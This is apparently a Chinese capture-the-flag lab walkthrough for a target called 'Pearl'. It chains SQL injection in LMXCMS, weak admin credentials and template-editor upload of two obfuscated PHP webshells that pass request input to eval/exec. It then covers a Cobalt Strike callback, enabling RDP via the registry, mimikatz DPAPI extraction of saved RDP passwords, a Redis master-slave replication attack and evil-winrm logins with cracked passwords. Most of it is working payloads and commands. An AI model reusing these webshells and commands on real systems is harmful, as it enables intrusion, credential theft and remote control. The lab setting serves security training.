cyberstrikelab-Pearl

梦想cms sql注入 + 后台文件上传

sqlmap.py -u "http://192.168.10.65/?m=Tags&name=" --technique=E --tamper=chardoubleencode -p name -D lmxcms --tables

注入出来之后密码是一个弱口令 admin admin123

修改为可以上传php文件,然后写一个免杀的木马

<?php
/**
 * Positional byte substitution used to assemble strings at runtime.
 *
 * The i-th byte of $a is replaced by the i-th byte of $b inside $c. Pairs are
 * applied one at a time, left to right, so text produced by an earlier pair can
 * be rewritten by a later one (the same semantics as str_replace() with array
 * arguments). A missing counterpart in $b deletes the byte, as str_replace() does.
 *
 * @param string $a bytes to look for, in order
 * @param string $b replacement bytes, matched by position to $a
 * @param string $c subject text
 * @return string   $c after all substitutions
 */
function m($a, $b, $c) {
    $result = $c;
    foreach (str_split($a) as $index => $fromByte) {
        $result = str_replace($fromByte, $b[$index] ?? '', $result);
    }
    return $result;
}

// Webshell sample as posted in the write-up, annotated for analysis.
// Detection notes: function names are assembled at runtime through m() so they
// never appear literally in the file; the script reads ini_get("disable_functions")
// and then passes a $_REQUEST parameter directly to eval()/exec(). Those three
// traits together are a strong webshell indicator for file scanners and runtime
// hooks on eval/exec.
//
// $S: command-execution function names, each rebuilt by m(). They resolve to
// "system", "exec", "shell_exec" and "passthru".
$S = array(
m("ncoai", "msyte", "cocain"),
m("sir", "cex", "iris"),
m("otab", "lshe", "taboo") . "_" . m("sir", "cex", "iris"),
m("gbledin", "upasthr", "bleeding")
);

// $D: the interpreter's disable_functions setting (the key name "disable_functions"
// is also assembled through m()), split on commas into a list.
$TR = m("etroubl", "edisabl", "trouble");
$MK = m("dpreambl", "sfunctio", "preambled");
$D = explode(",", ini_get($TR . '_' . $MK));

// $P: all request input via $_REQUEST; the payload is read from the 'lol' parameter.
$P = $_REQUEST;

foreach ($S as $A) {
// Only the first name in $S that is absent from disable_functions is acted on.
if (!in_array($A, $D)) {
// Dispatch on which name was selected.
if ($A == m("ncoai", "msyte", "cocain")) {
// "system" selected: the request parameter is passed straight to eval()
// (note: system() itself is not called in this branch).
if (isset($P['lol'])) {
eval($P['lol']); // executes request-supplied PHP source
}
} elseif ($A == m("sir", "cex", "iris")) {
// "exec" selected: the parameter is run as an OS command with stderr merged
// into stdout; captured output lines are echoed back, newline-joined.
exec($P['lol'] . " 2>&1", $arr);
echo join("\n", $arr) . "\n";
} else {
// "shell_exec" or "passthru" selected: same eval() path as the first branch.
if (isset($P['lol'])) {
eval($P['lol']);
}
}
// Stops after the first usable entry; later names in $S are never tried.
exit;
}
}
?>

构造上传

POST /admin.php?m=Template&a=editfile&dir= HTTP/1.1
Host: 192.168.10.65
Content-Length: 8375
Cache-Control: max-age=0
Origin: http://192.168.10.65
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.10.65/admin.php?m=Template&a=editfile&dir=default/error.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=f5lufa5cvplm7povphb842p643
Connection: keep-alive

settemcontent=1&filename=4.php&temcontent=%3C%3Fphp+%2F*%3Cmeta+name%3D%222v2wd8%22+content%3D%22qa9y1S5k%22%3E*%2F%0D%0A%24password%3D%27UUdWMqa9y1S5kllqa9y1S5kXqa9y1S5kd29KRjlRVDFOVVcyTnRaRjBwT3c9PQ%3D%3D%27%3B%0D%0A%24username+%3D+get_meta_tags%28__FILE__%29%5B%24_GET%5B%27token%27%5D%5D%3B%0D%0Aheader%28%22ddddddd%3A%22.%24username%29%3B%0D%0A%24arr+%3D+apache_response_headers%28%29%3B%0D%0A%24template_source%3D%27%27%3B%0D%0Aforeach+%28%24arr+as+%24k+%3D%3E+%24v%29+%7B%0D%0A++++if+%28%24k%5B0%5D+%3D%3D+%27d%27+%26%26+%24k%5B5%5D+%3D%3D+%27d%27%29+%7B%0D%0A++++++++%24template_source+%3D+str_replace%28%24v%2C%27%27%2C%24password%29%3B%0D%0A++++%7D%7D%0D%0A%24template_source+%3D+base64_decode%28%24template_source%29%3B%0D%0A%24template_source+%3D+base64_decode%28%24template_source%29%3B%0D%0A%24key+%3D+%27template_source%27%3B%0D%0A%24aes_decode%5B1%5D%3D%24%24key%3B%0D%0A%40eval%28%24aes_decode%5B1%5D%29%3B%0D%0A%24yBoZ6A+%3D+%22PCFET0NUWVBFIGh0bWw%2BCjxodG1sPgoJPGhlYWQ%2BCgkJPG1ldGEgY2hhcnNldD0idXRmLTgiPgoJCTx0aXRsZT7mi6bmiKrpobXpnaI8L3RpdGxlPgoJCTxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI%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%2BCgkJPGRpdiBpZD0ibWF4Ij4KCQkJPGRpdiBpZD0idG9wIj4KCQkJCTxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiBpZD0i5Zu%2B5bGCXzEiIHN0eWxlPSIiIHZpZXdCb3g9IjAgMCA5MyA2MCIgeD0iMHB4IiB5PSIwcHgiIHhtbG5zOnhtbD0iaHR0cDovL3d3dy53My5vcmcvWE1MLzE5OTgvbmFtZXNwYWNlIiB4bWw6c3BhY2U9InByZXNlcnZlIiB2ZXJzaW9uPSIxLjEiPgoJCQkJPHN0eWxlIHR5cGU9InRleHQvY3NzIj4KCQkJCQkuc3Qwe2ZpbGw6IzI3QTFGRDt9CgkJCQkJLnN0MXtmaWxsOiM0NzQ3NTU7fQoJCQkJCS5zdDJ7ZmlsbDojRkZGRkZGO30KCQkJCQkuc3Qze2ZpbGw6IzcxQzFGRTt9CgkJCQk8L3N0eWxlPgoJCQkJPGc%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%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%2BCgkJCQkJPHBhdGggY2xhc3M9InN0MyIgZD0iTSA4MyA0MiBIIDYzIGMgLTEuMSAwIC0yIC0wLjkgLTIgLTIgdiAwIGMgMCAtMS4xIDAuOSAtMiAyIC0yIGggMjAgYyAxLjEgMCAyIDAuOSAyIDIgdiAwIEMgODUgNDEuMSA4NC4xIDQyIDgzIDQyIFoiIC8%2BCgkJCQk8L2c%2BCgkJCQk8L3N2Zz4KCQkJPC9kaXY%2B
CgkJCQkJCTxkaXYgaWQ9Im1pZCI%2BCgkJCQk8ZGl2IGlkPSJ3YXJtIj4KCQkJCQk8c3Bhbj48Yj7mgqjnmoTor7fmsYLluKbmnInkuI3lkIjms5Xlj4LmlbDvvIzlt7LooqvnvZHnq5nnrqHnkIblkZjorr7nva7mi6bmiKrvvIE8L2I%2BPC9zcGFuPgoJCQkJPC9kaXY%2BCgkJCQk8ZGl2IGlkPSJ0aXAiPgoJCQkJCTxwPuWPr%2BiDveWOn%2BWboO%2B8muaCqOaPkOS6pOeahOWGheWuueWMheWQq%2BWNsemZqeeahOaUu%2BWHu%2Bivt%2BaxgjwvcD4KCQkJCQk8cD7lpoLkvZXop6PlhrPvvJo8L3A%2BCgkJCQkJPGRpdiBpZD0iZXhhbXBsZSI%2BCgkJCQkJCTxwPjHvvInmo4Dmn6Xmj5DkuqTlhoXlrrnvvJs8L3A%2BCgkJCQkJCTxwPjLvvInlpoLnvZHnq5nmiZjnrqHvvIzor7fogZTns7vnqbrpl7Tmj5DkvpvllYbvvJs8L3A%2BCgkJCQkJCTxwPjPvvInmma7pgJrnvZHnq5norr%2FlrqLvvIzor7fogZTns7vnvZHnq5nnrqHnkIblkZg8L3A%2BCgkJCQkJPC9kaXY%2BCgkJCQk8L2Rpdj4KCQkJPC9kaXY%2BCgkJCTxkaXYgaWQ9ImJvbSI%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%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%2BCgkJCQkJPC9nPgoJCQkJCTwvc3ZnPgoJCQkJPC9kaXY%2BCgkJCQk8ZGl2IGlkPSJyaWdodCI%2BCgkJCQkJPHNwYW4%2B5aaC5p6c5oKo5piv572R56uZ566h55CG5ZGY77yM6K%2B355m75b2V5a6J5YWo54uXPC9zcGFuPgoJCQkJCTxhIGhyZWY9Imh0dHA6Ly93d3cuc2FmZWRvZy5jbiI%2BPGlucHV0IHR5cGU9ImJ1dHRvbiIgbmFtZT0iZGV0YWlsIiBpZD0iZGV0YWlsIiB2YWx1ZT0i5p%2Bl55yL6K%2Bm5oOFIj48L2E%2BCgkJCQkJPHNwYW4%2B5oiWPC9zcGFuPgoJCQkJCTxhIGhyZWY9Imh0dHA6Ly9zZWN1cml0eS5zYWZlZG9nLmNuL2luZGV4Lmh0bWwiPjxpbnB1dCB0eXBlPSJidXR0b24iIG5hbWU9ImZlZWRiYWNrIiBpZD0iZmVlZGJhY2siIHZhbHVlPSLlj43ppojor6%2FmiqUiPjwvYT4KCQkJCTwvZGl2PgoJCQk8L2Rpdj4KCQkJPGRpdiBpZD0iZm9vdGVyIj4KCQkJCTxmb290ZXI%2BQ29weXJpZ2h0JiN4YTk7MjAxMy0yMDIwIOWOpumXqOacjeS6keS%2FoeaBr%2BenkeaKgOaciemZkOWFrOWPuCBBTEwgUmlnaHRzIFJlc2VydmVkIHwg6Ze9SUNQ5aSHMTQwMTQxMznlj7ctMTwvZm9vdGVyPgoJCQk8L2Rpdj4KCQk8L2Rpdj4KCTwvYm9keT4KPC9odG1sPg%3D%3D%22%3B%0D%0Aif%28+count%28%24_REQUEST%29+%7C%7C+file_get_contents%28%22php%3A%2F%2Finput%22%29+%29%7B%0D%0A%0D%0A%7Delse%7B%0D%0A++++header%28%27Content-Type%3Atext%2Fhtml%3Bcharset%3Dutf-8%27%29%3B++++http_response_code%28200%29%3B%0D%0A++++echo+base64_decode%2F**%2F%28%24yBoZ6A%29%3B%0D%0A%7D

先上线到cs然后去翻翻配置文件什么的

内网渗透

还是和之前一样添加后门用户rdp上去关防火墙

shell REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

fscan大法扫出了一个sql弱口令

登录发现不行

RDP远程桌面密码凭证获取

发现c盘有一个rdp连接,利用mimikatz去破解下密码

查看当前主机保存的RDP凭据

cmdkey /list

查找本地的Cred

dir /a %userprofile%\appdata\local\microsoft\credentials\*

获取到guidmasterkey

mimikatz.exe dpapi::cred /in:C:\Windows\system32\config\systemprofile\appdata\local\microsoft\credentials\F7A11901B817E047275D06BDB5BAF712

然后用这个找到masterkey

mimikatz.exe sekurlsa::dpapi

最后使用masterkey来解密凭证文件,得到administrator用户密码

mimikatz.exe "dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\F7A11901B817E047275D06BDB5BAF712 /masterkey:d66ec675b7789d8c929b9d887b63b8cdcdb0607b0ef6af226865964125c83e31608db9a7495a126ed80f04f854a4ff3c1393da53fe64e1080b2b10e2d933ee38"

获取到密码Lmxcms@cslab!
参考: https://blog.csdn.net/qq_36618918/article/details/130677478

Redis主从复制

给目标机器安装一个python环境然后用脚本打

python redis-attack.py -r 10.0.0.56 -L 10.0.0.65 -b

最后一个flag需要爆破密码才可以 密码为qwe!@#123

proxychains4 evil-winrm -i 10.0.0.23 -u Administrator -p 'qwe!@#123'